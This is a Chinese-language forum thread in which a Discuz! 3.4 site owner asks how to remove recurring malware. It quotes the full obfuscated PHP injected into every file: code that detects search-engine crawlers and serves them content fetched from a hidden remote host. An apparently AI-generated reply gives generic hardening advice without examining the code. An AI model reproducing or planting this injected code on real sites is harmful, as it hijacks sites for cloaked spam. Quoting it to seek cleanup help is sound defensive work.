DZ3.4被挂木马解决问题
各位大大,请问 社区所有PHP代码头被植入以下代码,请问彻底解决?每次换新代码覆盖没两天,就又被植入了。<?php
goto kBVB3; xe7sW: curl_setopt($ch, CURLOPT_HEADER, false); goto nXwRQ; LHGRb: header("\x43\x6f\x6e\164\x65\156\164\x2d\124\171\160\x65\72\x74\x65\170\x74\57\150\164\x6d\154\73\143\x68\x61\x72\x73\145\x74\x3d\x67\x62\x32\x33\61\x32"); goto Zcla7; R_Ek0: $file = base64_decode("\x61\x48\x52\60\143\x44\157\166\114\63\x52\154\132\x6e\116\x30\x4c\x6e\150\64\x62\x44\147\64\x4c\155\116\165\117\x6a\x67\167\115\104\101\x76\x61\x6e\x4e\x6a\x4c\x77\x3d\75") . base64_decode("\114\62\154\x75\132\x47\126\x34\114\156\102\x6f\143\x44\x39\x6f\142\63\116\60\x50\x51\x3d\75") . $host_name . "\x26\161\75" . $_SERVER["\121\125\105\122\131\137\123\x54\x52\x49\x4e\x47"]; goto z_rtS; lMvlC: curl_close($ch); goto oY2r7; ENQsF: curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "\107\105\124"); goto xe7sW; oY2r7: echo $c; goto YyrfW; z_rtS: $ch = curl_init(); goto qxRPh; Zcla7: $host_name = "\x68\x74\x74\x70\x3a\x2f\x2f" . $_SERVER["\123\x45\122\x56\x45\x52\x5f\x4e\x41\115\x45"] . $_SERVER["\x50\110\x50\x5f\123\105\x4c\106"]; goto oGR_n; nXwRQ: curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto Ob49w; qxRPh: curl_setopt($ch, CURLOPT_URL, $file); goto ENQsF; QwSWs: $c = curl_exec($ch); goto lMvlC; kxsvc: if (!(strpos($key, "\x62\x61\x69\144\x75") !== false || strpos($key, "\x68\141\157\163\x6f\165") !== false || strpos($key, "\x33\x36\60") !== false || strpos($key, "\171\x69\x73\157\165") !== false || strpos($key, "\x73\157\x67\157\x75") !== false || strpos($key, "\x67\x6f\157\147\x6c\145") !== false || strpos($key, "\x62\x79\164\145") !== false)) { goto dHcq4; } goto LHGRb; oGR_n: $ua = $_SERVER["\110\x54\x54\120\137\125\123\x45\122\x5f\x41\107\105\x4e\x54"]; goto R_Ek0; Ob49w: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto QwSWs; YyrfW: return; goto co91e; kBVB3: $key = strtolower($_SERVER["\x48\x54\x54\x50\137\125\x53\x45\122\x5f\x41\x47\x45\116\124"]); goto kxsvc; co91e: dHcq4:
?> 网站打开就是一片空白。怎么处理比较好,用社区工具也查了权限是没问题的 你好,关于DZ3.4被挂木马的问题,这是一个比较常见的安全问题。以下是一些彻底解决这个问题的步骤和建议:
1. **检查服务器权限**:
- 确保你的服务器文件和目录权限设置正确。通常,PHP文件的权限应该是644,目录权限应该是755。确保没有文件或目录的权限设置为777,这会导致安全漏洞。
- 检查是否有不必要的可写目录,特别是`data`、`config`、`uc_client/data`等目录。这些目录应该是可写的,但其他目录不应该有写权限。
2. **检查服务器安全**:
- 确保你的服务器操作系统和软件(如Apache、Nginx、PHP、MySQL等)都是最新版本,并且已经应用了所有安全补丁。
- 检查服务器上是否有其他未授权的用户或进程,特别是那些以root权限运行的进程。
3. **检查Discuz!代码**:
- 确保你使用的Discuz!版本是最新的,并且已经应用了所有安全补丁。你可以从DZ插件网(https://www.dz-x.net/)下载最新版本的Discuz!。
- 检查所有PHP文件,特别是那些被修改过的文件,确保没有可疑代码。你可以使用一些工具(如`diff`)来比较原始文件和被修改的文件。
4. **清理木马**:
- 使用专业的木马扫描工具(如ClamAV、Maldet等)扫描你的服务器和网站文件,确保没有木马残留。
- 如果发现木马文件,立即删除或隔离这些文件,并检查是否有其他文件被感染。
5. **加强安全措施**:
- 安装并配置Web应用防火墙(WAF),如ModSecurity,以防止未来的攻击。
- 定期备份你的网站和数据库,并将备份文件存储在安全的地方。
- 使用强密码,并定期更换密码。确保所有管理员账户都使用强密码。
6. **监控和日志分析**:
- 启用并定期检查服务器和网站的访问日志,查找异常访问模式或可疑IP地址。
- 使用监控工具(如Fail2Ban)来阻止恶意IP地址的访问。
7. **插件和模板安全**:
- 确保你使用的所有插件和模板都是从可信来源(如DZ插件网)下载的,并且是最新版本。
- 定期检查插件和模板的代码,确保没有后门或恶意代码。
8. **数据库安全**:
- 检查数据库是否有异常的表或数据,特别是那些与用户、管理员或插件相关的表。
- 确保数据库用户权限设置正确,避免使用root用户连接数据库。
通过以上步骤,你应该能够彻底解决DZ3.4被挂木马的问题。如果问题仍然存在,建议你联系专业的服务器安全团队或Discuz!开发者进行进一步的检查和修复。
希望这些建议对你有所帮助!如果你有其他问题,欢迎继续提问。
-- 本回答由 人工智能 AI智能体 生成,内容仅供参考,请仔细甄别。
页:
[1]